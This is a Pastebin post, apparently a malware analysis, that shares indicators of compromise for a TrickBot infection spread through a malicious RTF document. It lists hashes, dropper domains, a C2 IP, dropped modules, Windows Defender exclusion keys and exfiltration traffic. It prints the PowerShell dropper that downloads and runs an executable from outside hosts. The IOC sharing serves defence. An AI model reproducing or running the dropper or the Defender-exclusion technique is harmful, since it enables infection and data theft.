Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #malware #trickbot
- found by @neonprimetime security
- sample: https://www.reverse.it/sample/4087601bfc591c48bf90026164dde735b91f08898fbef13f0e85c8e64fc79487?environmentId=120
- iocs:
- correspondence.doc
- fd55b840d747fc0601b03f53d5d3d314
- task.bat
- D7746CD2D5E2BBF4961704E76A13EECB
- digitalmindsolution.com
- thirdeyetv.com
- lewl.bin
- greg4545.exe
- A6DCE7423960304106B6AD8D7F7D9FAD
- copied itself to:
- C:\Users\xxxxx\AppData\Roaming\winhttp\
- launched it's own copy of svchost.exe
- files created:
- C:\Users\Win7\AppData\Roaming\winhttp\FAQ
- C:\Users\Win7\AppData\Roaming\winhttp\README.md
- C:\Users\Win7\AppData\Roaming\winhttp\Modules\injectDll64 ( md5,861CFB79C14293F1DA731E42B90BD811 )
- C:\Users\Win7\AppData\Roaming\winhttp\Modules\systeminfo64 ( md5,5D4512296AA66BFC0F2AE610556D84F2 )
- C:\Users\Win7\AppData\Roaming\winhttp\Modules\injectDll64_configs\dinj (md5,7AED4235BC16913C98DCC866C087F38C)
- C:\Users\Win7\AppData\Roaming\winhttp\Modules\injectDll64_configs\dpost (md5,15B4898CF67FF914DBA1EEF3BC6C9646)
- C:\Users\Win7\AppData\Roaming\winhttp\Modules\injectDll64_configs\sinj (md5,2DFB40BAA7110C0418DA49F997710A9E)
- registries added:
- HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Win7\AppData\Roaming\winhttp\: 0x00000000
- HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Win7\AppData\Roaming\winhttp\: 0x00000000
- HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Win7\AppData\Roaming\winhttp\: 0x00000000
- network connections:
- GET /ip HTTP/1.1
- Connection: Keep-Alive
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
- Host: ipinfo.io
- POST /ser0514ca/[REDACTED PC NAME]_W617601.5A9716C6537690A1A0AA513B7AEF3301/82/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
- Host: 70.182.4.158
- Content-Disposition: form-data; name="data"
- **** REDACTED LIST OF FILES I HAD OPEN AND URLS I HAD OPEN IN BROWSER ****
- Content-Disposition: form-data; name="source"
- IE history
- interesting in memory strings:
- 0x1e276a (90): C:\Users\Win7\AppData\Roaming\winhttp\bad.exe
- script in the rtf:
- PowerShell ""function irJohn74([String] $KingOfSleep){(New-Object System.Net.WebClient).DownloadFile($KingOfSleep,'%TEMP%\greg4545.exe');Start-Process '%TEMP%\greg4545.exe';}try{irJohn74('http://digitalmindsolution.com/lewl.bin')}catch{irJohn74('http://thirdeyetv.com/lewl.bin')}""
- vt hits for RTF/DOC:
- MicroWorld-eScan,Exploit.RTF-PSH.Gen,14.05.2018,1
- CAT-QuickHeal,Exp.RTF.Heur.Gen.A,14.05.2018,1
- McAfee,Exploit-CVE2017-11882.p,14.05.2018,1
- Arcabit,Exploit.RTF-PSH.Gen,14.05.2018,1
- Kaspersky,HEUR:Exploit.MSOffice.Generic,14.05.2018,1
- BitDefender,Exploit.RTF-PSH.Gen,14.05.2018,1
- Ad-Aware,Exploit.RTF-PSH.Gen,14.05.2018,1
- Sophos,Exp/201711882-M,14.05.2018,1
- F-Secure,Exploit.RTF-PSH.Gen,14.05.2018,1
- TrendMicro,HEUR_RTFMALFORM,14.05.2018,1
- McAfee-GW-Edition,Exploit-CVE2017-11882.p,14.05.2018,1
- Emsisoft,Exploit.RTF-PSH.Gen (B),14.05.2018,1
- Avira,EXP/CVE-2017-11882.Gen,14.05.2018,1
- AegisLab,Exploit.Msoffice.Generic!c,14.05.2018,1
- ZoneAlarm,HEUR:Exploit.MSOffice.Generic,14.05.2018,1
- GData,Exploit.CVE-2017-11882.Gen,14.05.2018,1
- ALYac,Exploit.RTF-PSH.Gen,14.05.2018,1
- MAX,malware (ai score=81),14.05.2018,1
- Tencent,Office.Exploit.Generic.Efar,14.05.2018,1
- Fortinet,PowerShell/Agent.C1546!tr.dldr,14.05.2018,1
- Qihoo-360,Win32/Trojan.Exploit.ed7,14.05.2018,1
- vt hits for EXE:
- MicroWorld-eScan,Trojan.GenericKD.40242422,15.05.2018,0
- Cylance,Unsafe,15.05.2018,0
- Invincea,heuristic,03.05.2018,12
- Symantec,ML.Attribute.HighConfidence,14.05.2018,1
- TrendMicro-HouseCall,Suspicious_GEN.F47V0514,15.05.2018,0
- Avast,FileRepMalware,15.05.2018,0
- Kaspersky,UDS:DangerousObject.Multi.Generic,15.05.2018,0
- Babable,Malware.HighConfidence,06.04.2018,39
- AegisLab,Ml.Attribute.Gen!c,15.05.2018,0
- Ad-Aware,Trojan.GenericKD.40242422,15.05.2018,0
- McAfee-GW-Edition,BehavesLike.Win32.Ransomware.gh,14.05.2018,1
- SentinelOne,static engine - malicious,25.02.2018,79
- Webroot,W32.Malware.Gen,15.05.2018,0
- Endgame,malicious (high confidence),07.05.2018,8
- ZoneAlarm,Trojan.Win32.Inject.ajogy,15.05.2018,0
- McAfee,Artemis!A6DCE7423960,15.05.2018,0
- VBA32,BScope.Trojan.Inject,14.05.2018,1
- ESET-NOD32,Win32/TrickBot.AQ,15.05.2018,0
- Ikarus,PUA.Multibar,14.05.2018,1
- AVG,FileRepMalware,15.05.2018,0
- Paloalto,generic.ml,15.05.2018,0
- vt hists for batch script:
- McAfee,PS/Agent.u,14.05.2018,1
- McAfee-GW-Edition,PS/Agent.u,14.05.2018,1
- Fortinet,PowerShell/Agent.C1546!tr.dldr,14.05.2018,1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement